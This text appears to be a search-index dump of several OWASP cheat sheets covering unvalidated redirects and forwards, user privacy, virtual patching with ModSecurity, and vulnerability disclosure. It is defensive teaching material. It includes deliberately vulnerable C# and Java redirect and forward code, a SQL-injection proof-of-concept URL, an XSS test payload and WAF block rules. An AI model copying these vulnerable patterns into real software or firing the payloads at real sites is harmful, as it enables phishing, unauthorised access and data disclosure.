[HttpPost]
public ActionResult LogOn(LogOnModel model, string returnUrl)
{
    if (ModelState.IsValid)
    {
        if (MembershipService.ValidateUser(model.UserName, model.Password))
        {
            FormsService.SignIn(model.UserName, model.RememberMe);
            if (!String.IsNullOrEmpty(returnUrl))
            {
                return Redirect(returnUrl);
            }
            else
            {
                return RedirectToAction("Index", "Home");
            }
        }
        else
        {
            ModelState.AddModelError("", "The user name or password provided is incorrect.");
        }
    }

    // If we got this far, something failed, redisplay form
    return View(model);
}
"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#dangerous-forward-example","title":"Dangerous Forward Example","text":"

When applications allow user input to forward requests between different parts of the site, the application must check that the user is authorized to access the URL, is permitted to perform the functions it provides, and that it is an appropriate URL request.

If the application fails to perform these checks, an attacker crafted URL may pass the application's access control check and then forward the attacker to an administrative function that is not normally permitted.

Example:

http://www.example.com/function.jsp?fwd=admin.jsp

The following code is a Java servlet that will receive a GET request with a URL parameter named fwd in the request to forward to the address specified in the URL parameter. The servlet will retrieve the URL parameter value from the request and complete the server-side forward processing before responding to the browser.

public class ForwardServlet extends HttpServlet
{
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String query = request.getQueryString();
        if (query.contains("fwd"))
        {
            String fwd = request.getParameter("fwd");
            try
            {
                request.getRequestDispatcher(fwd).forward(request, response);
            }
            catch (ServletException e)
            {
                e.printStackTrace();
            }
        }
    }
}
"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#preventing-unvalidated-redirects-and-forwards","title":"Preventing Unvalidated Redirects and Forwards","text":"

Safe use of redirects and forwards can be done in a number of ways:

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#validating-urls","title":"Validating URLs","text":"

Validating and sanitizing user input to determine whether the URL is safe is not a trivial task. Detailed instructions on how to implement URL validation are described in the Server-Side Request Forgery Prevention Cheat Sheet.
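
As a simplified sketch of one possible approach, a redirect target supplied by the user can be checked against a server-side allow-list of hosts before use (the permitted hosts, the default target and the function name are illustrative):

from urllib.parse import urlparse

ALLOWED_HOSTS = {"www.example.com", "intranet.example.com"}

def safe_redirect_target(user_supplied_url, default="/home"):
    parsed = urlparse(user_supplied_url)
    if parsed.scheme not in ("http", "https"):
        return default  # rejects javascript:, data:, protocol-relative URLs, etc.
    if parsed.hostname not in ALLOWED_HOSTS:
        return default  # rejects any host not explicitly allow-listed
    return user_supplied_url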

"},{"location":"cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html","title":"User Privacy Protection Cheat Sheet","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This OWASP Cheat Sheet introduces mitigation methods that web developers may utilize in order to protect their users from a vast array of potential threats and aggressions that might try to undermine their privacy and anonymity. This cheat sheet focuses on privacy and anonymity threats that users might face by using online services, especially in contexts such as social networking and communication platforms.

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#guidelines","title":"Guidelines","text":""},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#strong-cryptography","title":"Strong Cryptography","text":"

Any online platform that handles user identities, private information or communications must be secured with the use of strong cryptography. User communications must be encrypted in transit and in storage. User secrets such as passwords must also be protected using strong, collision-resistant hashing algorithms with increasing work factors, in order to greatly mitigate the risk of exposed credentials as well as to provide proper integrity control.

To protect data in transit, developers must use and adhere to TLS/SSL best practices such as verified certificates, adequately protected private keys, usage of strong ciphers only, informative and clear warnings to users, as well as sufficient key lengths. Private data must be encrypted in storage using keys with sufficient lengths and under strict access conditions, both technical and procedural. User credentials must be hashed regardless of whether or not they are encrypted in storage.
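
As a minimal sketch of salted password hashing with a configurable work factor, using only the Python standard library (the algorithm choice and the iteration count are illustrative; follow the Password Storage Cheat Sheet for current recommendations):

import hashlib, hmac, os

ITERATIONS = 600_000  # illustrative PBKDF2-HMAC-SHA256 work factor

def hash_password(password, salt=None):
    salt = salt or os.urandom(16)  # unique per-user salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, expected):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, expected)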

For detailed guides about strong cryptography and best practices, read the following OWASP references:

  1. Cryptographic Storage Cheat Sheet.
  2. Authentication Cheat Sheet.
  3. Transport Layer Protection Cheat Sheet.
  4. Guide to Cryptography.
  5. Testing for TLS/SSL.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#support-http-strict-transport-security","title":"Support HTTP Strict Transport Security","text":"

HTTP Strict Transport Security (HSTS) is an HTTP header set by the server indicating to the user agent that only secure (HTTPS) connections are accepted, prompting the user agent to change all insecure HTTP links to HTTPS, and forcing the compliant user agent to fail-safe by refusing any TLS/SSL connection that is not trusted by the user.

HSTS is widely supported by popular user agents, such as Mozilla Firefox and Google Chrome. It is very useful for users who are in consistent fear of spying and Man-in-the-Middle attacks.

If it is impractical to force HSTS on all users, web developers should at least give users the choice to enable it if they wish to make use of it.

For more details regarding HSTS, please visit:

  1. HTTP Strict Transport Security in Wikipedia.
  2. IETF for HSTS RFC.
  3. OWASP Appsec Tutorial Series - Episode 4: Strict Transport Security.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#digital-certificate-pinning","title":"Digital Certificate Pinning","text":"

Certificate Pinning is the practice of hardcoding or storing a predefined set of information (usually hashes) for digital certificates/public keys in the user agent (be it web browser, mobile app or browser plugin) such that only the predefined certificates/public keys are used for secure communication, and all others will fail, even if the user trusted (implicitly or explicitly) the other certificates/public keys.

Some advantages for pinning are:

For details regarding certificate pinning, please refer to the following:

  1. OWASP Certificate Pinning Cheat Sheet.
  2. Public Key Pinning Extension for HTTP RFC.
  3. Securing the SSL channel against man-in-the-middle attacks: Future technologies - HTTP Strict Transport Security and Pinning of Certs, by Tobias Gondrom.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#panic-modes","title":"Panic Modes","text":"

A panic mode is a mode that threatened users can turn to when they come under direct threat to disclose account credentials.

Giving users the ability to create a panic mode can help them survive these threats, especially in tumultuous regions around the world. Unfortunately many users around the world are subject to types of threats that most web developers do not know of or take into account.

Examples of panic modes are modes where distressed users can delete their data upon threat, log into fake inboxes/accounts/systems, or invoke triggers to backup/upload/hide sensitive data.

The appropriate panic mode to implement differs depending on the application type. Disk encryption software such as VeraCrypt might implement a panic mode that starts up a fake system partition if the user enters their distress password.

Email providers might implement a panic mode that hides predefined sensitive emails or contacts, allowing reading innocent email messages only, usually as defined by the user, while preventing the panic mode from overtaking the actual account.

An important note about panic modes is that they must not be easily discoverable, if at all. An adversary inside a victim's panic mode must not have any way, or as few possibilities as possible, of finding out the truth. This means that once inside a panic mode, most non-sensitive normal operations must be allowed to continue (such as sending or receiving email), and that further panic modes must be possible to create from inside the original panic mode (If the adversary tried to create a panic mode on a victim's panic mode and failed, the adversary would know they were already inside a panic mode, and might attempt to hurt the victim).

Another solution would be to prevent panic modes from being generated from within the user account, and instead make them a bit harder for adversaries to spoof. For example, a panic mode could only be created out of band, and adversaries must have no way to know whether a panic mode already exists for a particular account.

The implementation of a panic mode must always aim to confuse adversaries and prevent them from reaching the actual accounts/sensitive data of the victim, as well as prevent the discovery of any existing panic modes for a particular account.

For more details regarding VeraCrypt's hidden operating system mode, please refer to:

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#remote-session-invalidation","title":"Remote Session Invalidation","text":"

In case user equipment is lost, stolen or confiscated, or under suspicion of cookie theft, it might be very beneficial for users to be able to view their current online sessions and disconnect/invalidate any suspicious lingering sessions, especially ones that belong to stolen or confiscated devices. Remote session invalidation can also help if a user suspects that their session details were stolen in a Man-in-the-Middle attack.
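
A minimal sketch of a server-side session registry that lets a user list and revoke their own sessions (the in-memory store and the recorded fields are illustrative; a real system would persist this and tie it to the session middleware):

import secrets, time

sessions = {}  # token -> {"user": str, "device": str, "created": float}

def create_session(user, device):
    token = secrets.token_urlsafe(32)
    sessions[token] = {"user": user, "device": device, "created": time.time()}
    return token

def list_sessions(user):
    # Shown to the user so they can spot suspicious or lingering sessions
    return [(t, s["device"], s["created"]) for t, s in sessions.items() if s["user"] == user]

def revoke_session(user, token):
    if token in sessions and sessions[token]["user"] == user:
        del sessions[token]  # the cookie/token is no longer accepted server-side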

For details regarding session management, please refer to:

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#allow-connections-from-anonymity-networks","title":"Allow Connections from Anonymity Networks","text":"

Anonymity networks, such as the Tor Project, give users in tumultuous regions around the world a golden chance to escape surveillance, access information or break censorship barriers. More often than not, activists in troubled regions use such networks to report injustice or send uncensored information to the rest of the world, especially mediums such as social networks, media streaming websites and email providers.

Web developers and network administrators must pursue every avenue to enable users to access services from behind such networks, and any policy made against such anonymity networks needs to be carefully re-evaluated with respect to its impact on people around the world.

If possible, application developers should try to integrate or enable easy coupling of their applications with these anonymity networks, such as supporting SOCKS proxies or integration libraries (e.g. OnionKit for Android).
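
As a small client-side illustration of such coupling, an outbound HTTP request can be routed through a locally running Tor SOCKS proxy (this assumes the requests library with its optional SOCKS support installed, e.g. requests[socks], and Tor listening on its default port 9050):

import requests

TOR_PROXY = {"http": "socks5h://127.0.0.1:9050",
             "https": "socks5h://127.0.0.1:9050"}

# socks5h resolves hostnames through the proxy, avoiding local DNS leakage
response = requests.get("https://check.torproject.org/", proxies=TOR_PROXY, timeout=30)
print(response.status_code)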

For more information about anonymity networks, and the user protections they provide, please refer to:

  1. The Tor Project.
  2. I2P Network.
  3. OnionKit: Boost Network Security and Encryption in your Android Apps.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#prevent-ip-address-leakage","title":"Prevent IP Address Leakage","text":"

Preventing leakage of user IP addresses is of great significance when user protection is in scope. Any application that hosts external third-party content, such as avatars, signatures or photo attachments, must take into account the benefits of allowing users to block third-party content from being loaded in the application page.

If it is possible to embed third-party, external-domain images, for example in a user's feed or timeline, an adversary might use this to discover a victim's real IP address by hosting the image on their own domain and watching for HTTP requests for that image.

Many web applications need user content to operate, and this is completely acceptable as a business process; however web developers are advised to consider giving users the option of blocking external content as a precaution. This applies mainly to social networks and forums, but can also apply to web-based e-mail, where images can be embedded in HTML-formatted emails.

A similar issue exists in HTML-formatted emails that contain third-party images, however most email clients and providers block loading of third-party content by default; giving users better privacy and anonymity protection.

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#honesty-transparency","title":"Honesty & Transparency","text":"

If the web application cannot provide enough legal or political protections to the user, or if the web application cannot prevent misuse or disclosure of sensitive information such as logs, the truth must be told to the users in a clear understandable form, so that users can make an educated choice about whether or not they should use that particular service.

If it doesn't violate the law, inform users if their information is being requested for removal or investigation by external entities.

Honesty goes a long way towards cultivating a culture of trust between a web application and its users, and it allows many users around the world to weigh their options carefully, preventing harm to users in vulnerable regions around the world.

More insight regarding secure logging can be found at:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html","title":"Virtual Patching Cheat Sheet","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The goal of this cheat sheet is to present a concise virtual patching framework that organizations can follow to maximize the timely implementation of mitigation protections.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#definition-virtual-patching","title":"Definition: Virtual Patching","text":"

A security policy enforcement layer which prevents and reports the exploitation attempt of a known vulnerability.

The virtual patch works when the security enforcement layer analyzes transactions and intercepts attacks in transit, so malicious traffic never reaches the web application. The resulting impact of virtual patching is that, while the actual source code of the application itself has not been modified, the exploitation attempt does not succeed.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#why-not-just-fix-the-code","title":"Why Not Just Fix the Code","text":"

From a purely technical perspective, the number one remediation strategy would be for an organization to correct the identified vulnerability within the source code of the web application. This concept is universally agreed upon by both web application security experts and system owners. Unfortunately, in real-world business situations, there arise many scenarios where updating the source code of a web application is not easy, such as:

The important point is this - Code level fixes and Virtual Patching are NOT mutually exclusive. They are processes that are executed by different teams (OWASP Builders/Devs vs. OWASP Defenders/OpSec) and can be run in tandem.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#value-of-virtual-patching","title":"Value of Virtual Patching","text":"

The two main goals of Virtual Patching are:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#virtual-patching-tools","title":"Virtual Patching Tools","text":"

Notice that the definition above did not list any specific tool as there are a number of different options that may be used for virtual patching efforts such as:

For illustration purposes, the examples in this cheat sheet use the open source ModSecurity WAF tool.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#a-virtual-patching-methodology","title":"A Virtual Patching Methodology","text":"

Virtual Patching, like most other security processes, is not something that should be approached haphazardly. Instead, a consistent, repeatable process should be followed that will provide the best chances of success. The following virtual patching workflow mimics the industry accepted practice for conducting IT Incident Response and consists of the following phases:

  1. Preparation.
  2. Identification.
  3. Analysis.
  4. Virtual Patch Creation.
  5. Implementation/Testing.
  6. Recovery/Follow Up.
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-public-vulnerability","title":"Example Public Vulnerability","text":"

Let's take the following SQL Injection vulnerability as our example for the remainder of this article:

WordPress Shopping Cart Plugin for WordPress\n/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\nreqID Parameter prone to SQL Injection.\n

Description:

WordPress Shopping Cart Plugin for WordPress contains a flaw that may allow an attacker to carry out an SQL injection attack.

The issue is due to the /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php script not properly sanitizing user-supplied input to the reqID parameter.

This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#preparation-phase","title":"Preparation Phase","text":"

The importance of properly utilizing the preparation phase with regards to virtual patching cannot be overstated. You need to do a number of things to set up the virtual patching processes and framework prior to actually having to deal with an identified vulnerability, or worse yet, react to a live web application intrusion. The point is that the middle of a live compromise is not the ideal time to be proposing the installation of a web application firewall and the concept of a virtual patch. Tension is high during real incidents and time is of the essence, so lay the foundation of virtual patching when the waters are calm and get everything in place and ready to go before an incident occurs.

Here are a few critical items that should be addressed during the preparation phase:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#identification-phase","title":"Identification Phase","text":"

The Identification Phase occurs when an organization becomes aware of a vulnerability within their web application. There are generally two different methods of identifying vulnerabilities: Proactive and Reactive.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#proactive-identification","title":"Proactive Identification","text":"

This occurs when an organization takes it upon itself to assess its web security posture and conducts the following tasks:

Because custom-coded web applications are unique, these proactive identification tasks are extremely important, as you are not able to rely upon third-party vulnerability notifications.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#reactive-identification","title":"Reactive Identification","text":"

There are three main reactive methods for identifying vulnerabilities:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#analysis-phase","title":"Analysis Phase","text":"

Here are the recommended steps to start the analysis phase:

  1. Determine Virtual Patching Applicability - Virtual patching is ideally suited for injection-type flaws but may not provide an adequate level of attack surface reduction for other attack types or categories. Thorough analysis of the underlying flaw should be conducted to determine if the virtual patching tool has adequate detection logic capabilities.
  2. Utilize Bug Tracking/Ticketing System - Enter the vulnerability information into a bug tracking system for tracking purposes and metrics. It is recommended to use a ticketing system you already have, such as Jira, or a specialized tool such as ThreadFix.
  3. Verify the name of the vulnerability - This means that you need to have the proper public vulnerability identifier (such as CVE name/number) specified by the vulnerability announcement, vulnerability scan, etc. If the vulnerability is identified proactively rather than through public announcements, then you should assign your own unique identifier to each vulnerability.
  4. Designate the impact level - It is always important to understand the level of criticality involved with a web vulnerability. Information leakages may not be treated in the same manner as an SQL Injection issue.
  5. Specify which versions of software are impacted - You need to identify which versions of the software are listed as affected so that you can determine whether the version(s) you have installed are impacted.
  6. List what configuration is required to trigger the problem - Some vulnerabilities may only manifest themselves under certain configuration settings.
  7. List Proof of Concept (PoC) exploit code or payloads used during attacks/testing - Many vulnerability announcements have accompanying exploit code that shows how to demonstrate the vulnerability. If this data is available, make sure to download it for analysis. This will be useful later on when both developing and testing the virtual patch.
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#virtual-patch-creation-phase","title":"Virtual Patch Creation Phase","text":"

The process of creating an accurate virtual patch is bound by two main tenets:

  1. No false positives - Do not ever block legitimate traffic under any circumstances.
  2. No false negatives - Do not ever miss attacks, even when the attacker intentionally tries to evade detection.

Care should be taken to attempt to adhere to both of these rules. It may not be possible to achieve 100% of each of these goals, but remember that virtual patching is about Risk Reduction. It should be understood by business owners that while you are gaining the advantage of shortening the Time-to-Fix metric, you may not be implementing a complete fix for the flaw.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#manual-virtual-patch-creation","title":"Manual Virtual Patch Creation","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#positive-security-allow-list-virtual-patches-recommended-solution","title":"Positive Security (Allow List) Virtual Patches (Recommended Solution)","text":"

The positive security model (allow list) is a comprehensive security mechanism that provides an independent input validation envelope to an application. The model specifies the characteristics of valid input (character set, length, etc.) and denies anything that does not conform. By defining rules for every parameter in every page of the application, the application is protected by an additional security envelope independent of its code.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-allow-list-modsecurity-virtual-patch","title":"Example Allow List ModSecurity Virtual Patch","text":"

In order to create an allow-list virtual patch, you must be able to verify what the normal, expected input values are. If you have implemented proper audit logging as part of the Preparation Phase, then you should be able to review audit logs to identify the format of expected input types. In this case, the reqID parameter is supposed to only hold integer characters so we can use this virtual patch:

##\n## Verify we only receive 1 parameter called \"reqID\"\n##\nSecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:1,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter - Duplicate Parameters Names Seen.',logdata:'%{matched_var}'\"\n  SecRule &ARGS:/reqID/ \"!@eq 1\"\n\n##\n## Verify reqID's payload only contains integers\n##\nSecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:2,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter.',logdata:'%{args.reqid}'\"\n  SecRule ARGS:/reqID/ \"!@rx ^[0-9]+$\"\n

This virtual patch will inspect the reqID parameter value on the specified page and prevent any characters other than integers from being accepted as input.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#negative-security-block-list-virtual-patches","title":"Negative Security (Block List) Virtual Patches","text":"

A negative security model (block list) is based on a set of rules that detect specific known attacks rather than allow only valid traffic.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-block-list-modsecurity-virtual-patch","title":"Example Block List ModSecurity Virtual Patch","text":"

Here is the example PoC code that was supplied by the public advisory:

http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1\n

Looking at the payload, we can see that the attacker is inserting a single quote character and then adding additional SQL query logic to the end. Based on this data, we could disallow the single quote character like this:

SecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:1,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter.',logdata:'%{args.reqid}'\"\n  SecRule ARGS:/reqID/ \"@pm '\"\n
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#which-method-is-better-for-virtual-patching-positive-or-negative-security","title":"Which Method is Better for Virtual Patching \u2013 Positive or Negative Security","text":"

A virtual patch may employ either a positive or negative security model. Which one you decide to use depends on the situation and a few different considerations. For example, negative security rules can usually be implemented more quickly; however, they are more likely to be evaded.

Positive security rules, on the other hand, provide better protection; however, creating them is often a manual process, which is not scalable and is difficult to maintain for large/dynamic sites. While manual positive security rules for an entire site may not be feasible, a positive security model can be selectively employed when a vulnerability alert identifies a specific location with a problem.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#beware-of-exploit-specific-virtual-patches","title":"Beware of Exploit-Specific Virtual Patches","text":"

You want to resist the urge to take the easy road and quickly create an exploit-specific virtual patch.

For instance, if an authorized penetration test identified an XSS vulnerability on a page and used the following attack payload in the report:

<script>\nalert('XSS Test')\n</script>\n

It would not be wise to implement a virtual patch that simply blocks that exact payload. While it may provide some immediate protection, its long term value is significantly decreased.
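
As a hypothetical Java illustration of why this matters (both checks below are deliberately simplistic and are not a recommended XSS defence), a patch hardcoded to the reported payload is bypassed by a trivially modified variant, while a check keyed to the class of attack still fires:

public class ExploitSpecificPatchDemo {\n//Exploit-specific check: only blocks the exact payload from the report\nstatic boolean blockedByExactMatch(String input) {\nreturn input.contains(\"<script>alert('XSS Test')</script>\");\n}\n\n//Broader (still simplistic) check keyed to the attack class rather than one payload\nstatic boolean blockedByGenericCheck(String input) {\nreturn input.toLowerCase().contains(\"<script\");\n}\n\npublic static void main(String[] args) {\nString variant = \"<ScRiPt>alert('XSS Test 2')</ScRiPt>\";\nSystem.out.println(blockedByExactMatch(variant)); //false - the exploit-specific patch is bypassed\nSystem.out.println(blockedByGenericCheck(variant)); //true - the broader check still fires\n}\n}\n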

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#automated-virtual-patch-creation","title":"Automated Virtual Patch Creation","text":"

Manual patch creation may become unfeasible as the number of vulnerabilities grows, and automated means may become necessary. If the vulnerabilities were identified using automated tools and an XML report is available, it is possible to leverage automated processes to auto-convert this vulnerability data into virtual patches for protection systems.

Three examples include:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#implementationtesting-phase","title":"Implementation/Testing Phase","text":"

In order to accurately test out the newly created virtual patches, it may be necessary to use an application other than a web browser. Some useful tools are:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#testing-steps","title":"Testing Steps","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#recoveryfollow-up-phase","title":"Recovery/Follow-Up Phase","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html","title":"Vulnerability Disclosure Cheat Sheet","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is intended to provide guidance on the vulnerability disclosure process for both security researchers and organisations. This is an area where collaboration is extremely important, but that can often result in conflict between the two parties.

Researchers should:

Organisations should:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#methods-of-disclosure","title":"Methods of Disclosure","text":"

There are a number of different models that can be followed when disclosing vulnerabilities, which are listed in the sections below.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#private-disclosure","title":"Private Disclosure","text":"

In the private disclosure model, the vulnerability is reported privately to the organisation. The organisation may choose to publish the details of the vulnerabilities, but this is done at the discretion of the organisation, not the researcher, meaning that many vulnerabilities may never be made public. The majority of bug bounty programs require that the researcher follows this model.

The main problem with this model is that if the vendor is unresponsive, or decides not to fix the vulnerability, then the details may never be made public. Historically this has led to researchers getting fed up with companies ignoring and trying to hide vulnerabilities, leading them to the full disclosure approach.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#full-disclosure","title":"Full Disclosure","text":"

With the full disclosure approach, the full details of the vulnerability are made public as soon as they are identified. This means that the full details (sometimes including exploit code) are available to attackers, often before a patch is available. The full disclosure approach is primarily used in response to organisations ignoring reported vulnerabilities, in order to put pressure on them to develop and publish a fix.

This makes the full disclosure approach very controversial, and it is seen as irresponsible by many people. Generally it should only be considered as a last resort, when all other methods have failed, or when exploit code is already publicly available.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#responsible-or-coordinated-disclosure","title":"Responsible or Coordinated Disclosure","text":"

Responsible disclosure attempts to find a reasonable middle ground between these two approaches. With responsible disclosure, the initial report is made privately, but the full details are published once a patch has been made available (sometimes with a delay to allow more time for the patches to be installed).

In many cases, the researcher also provides a deadline for the organisation to respond to the report, or to provide a patch. If this deadline is not met, then the researcher may adopt the full disclosure approach, and publish the full details.

Google's Project Zero adopts a similar approach, where the full details of the vulnerability are published after 90 days regardless of whether or not the organisation has published a patch.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#reporting-vulnerabilities","title":"Reporting Vulnerabilities","text":"

This section is intended to provide guidance for security researchers on how to report vulnerabilities to organisations.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#warnings-and-legality","title":"Warnings and Legality","text":"

Before carrying out any security research or reporting vulnerabilities, ensure that you know and understand the laws in your jurisdiction. This cheat sheet does not constitute legal advice, and should not be taken as such.

The following points highlight a number of areas that should be considered:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#finding-contact-details","title":"Finding Contact Details","text":"

The first step in reporting a vulnerability is finding the appropriate person to report it to. Although some organisations have clearly published disclosure policies, many do not, so it can be difficult to find the correct place to report the issue.

Where there is no clear disclosure policy, the following areas may provide contact details:

When reaching out to people who are not dedicated security contacts, request the details for a relevant member of staff, rather than disclosing the vulnerability details to whoever accepts the initial contact (especially over social media).

If it is not possible to contact the organisation directly, a national or sector-based CERT may be able to assist.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#initial-report","title":"Initial Report","text":"

Once a security contact has been identified, an initial report should be made of the details of the vulnerability. Ideally this should be done over an encrypted channel (such as the use of PGP keys), although many organisations do not support this.

The initial report should include:

In many cases, especially in smaller organisations, the security reports may be handled by developers or IT staff who do not have a security background. This means that they may not be familiar with many security concepts or terminology, so reports should be written in clear and simple terms.

It may also be beneficial to provide a recommendation on how the issue could be mitigated or resolved. However, unless the details of the system or application are known, or you are very confident in the recommendation, it may be better to point the developers to some more general guidance (such as an OWASP cheat sheet).

If you are planning to publish the details of the vulnerability after a period of time (as per some responsible disclosure policies), then this should be clearly communicated in the initial email - but try to do so in a tone that doesn't sound threatening to the recipient.

If the organisation does not have an established bug bounty program, then avoid asking about payments or rewards in the initial contact - leave it until the issue has been acknowledged (or ideally fixed). In particular, do not demand payment before revealing the details of the vulnerability. At best this will look like an attempt to scam the company, at worst it may constitute blackmail.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#ongoing-communication","title":"Ongoing Communication","text":"

While simpler vulnerabilities might be resolved solely from the initial report, in many cases there will be a number of emails back and forth between the researcher and the organisation. Especially for more complex vulnerabilities, the developers or administrators may ask for additional information or recommendations on how to resolve the issue. They may also ask for assistance in retesting the issue once a fix has been implemented. Although there is no obligation to carry out this retesting, doing so and providing feedback on the fixes is very beneficial, as long as the request is reasonable.

It may also be necessary to chase up the organisation if they become unresponsive, or if the established deadline for publicly disclosing the vulnerability is approaching. Ensure that this communication stays professional and positive - if the disclosure process becomes hostile then neither party will benefit.

Be patient if it's taking a while for the issue to be resolved. The developers may be under significant pressure from different people within the organisation, and may not be able to be fully open in their communication. Triaging, developing, reviewing, testing and deploying a fix within an enterprise environment takes significantly more time than most researchers expect, and being constantly hassled for updates just adds another level of pressure on the developers.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#when-to-give-up","title":"When to Give Up","text":"

Despite every effort that you make, some organisations are not interested in security, are impossible to contact, or may be actively hostile to researchers disclosing vulnerabilities. In some cases they may even threaten to take legal action against researchers. This is very disheartening for the researcher, and it is important not to take it personally. When this happens, there are a number of options that can be taken.

There are many organisations who have a genuine interest in security, and are very open and co-operative with security researchers. Unless the vulnerability is extremely serious, it is not worth burning yourself out, or risking your career and livelihood over an organisation who doesn't care.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#publishing","title":"Publishing","text":"

Once a vulnerability has been patched (or not), then a decision needs to be made about publishing the details. This should ideally be done through discussion with the vendor, and at a minimum the vendor should be notified that you intend to publish, and provided with a link to the published details. The disclosure would typically include:

Some organisations may request that you do not publish the details at all, or that you delay publication to allow their users more time to install security patches. In the interest of maintaining a positive relationship with the organisation, it is worth trying to find a compromise position on this.

Whether to publish a working proof of concept (or functional exploit code) is a subject of debate. Some people will view this as a \"blackhat\" move, and will argue that by doing so you are directly helping criminals compromise their users. On the other hand, the code can be used by both system administrators and penetration testers to test their systems, and attackers will be able to develop or reverse engineer working exploit code anyway if the vulnerability is sufficiently valuable.

If you are publishing the details in hostile circumstances (such as an unresponsive organisation, or after a stated period of time has elapsed) then you may face threats and even legal action. Whether there is any legal basis for this will depend on your jurisdiction, and whether you signed any form of non-disclosure agreement with the organisation. Make sure you understand your legal position before doing so.

Note that many bug bounty programs forbid researchers from publishing the details without the agreement of the organisation. If you choose to do so, you may forfeit the bounty or be banned from the platform - so read the rules of the program before publishing.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#receiving-vulnerability-reports","title":"Receiving Vulnerability Reports","text":"

This section is intended to provide guidance for organisations on how to accept and receive vulnerability reports.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#bug-bounty-programs","title":"Bug Bounty Programs","text":"

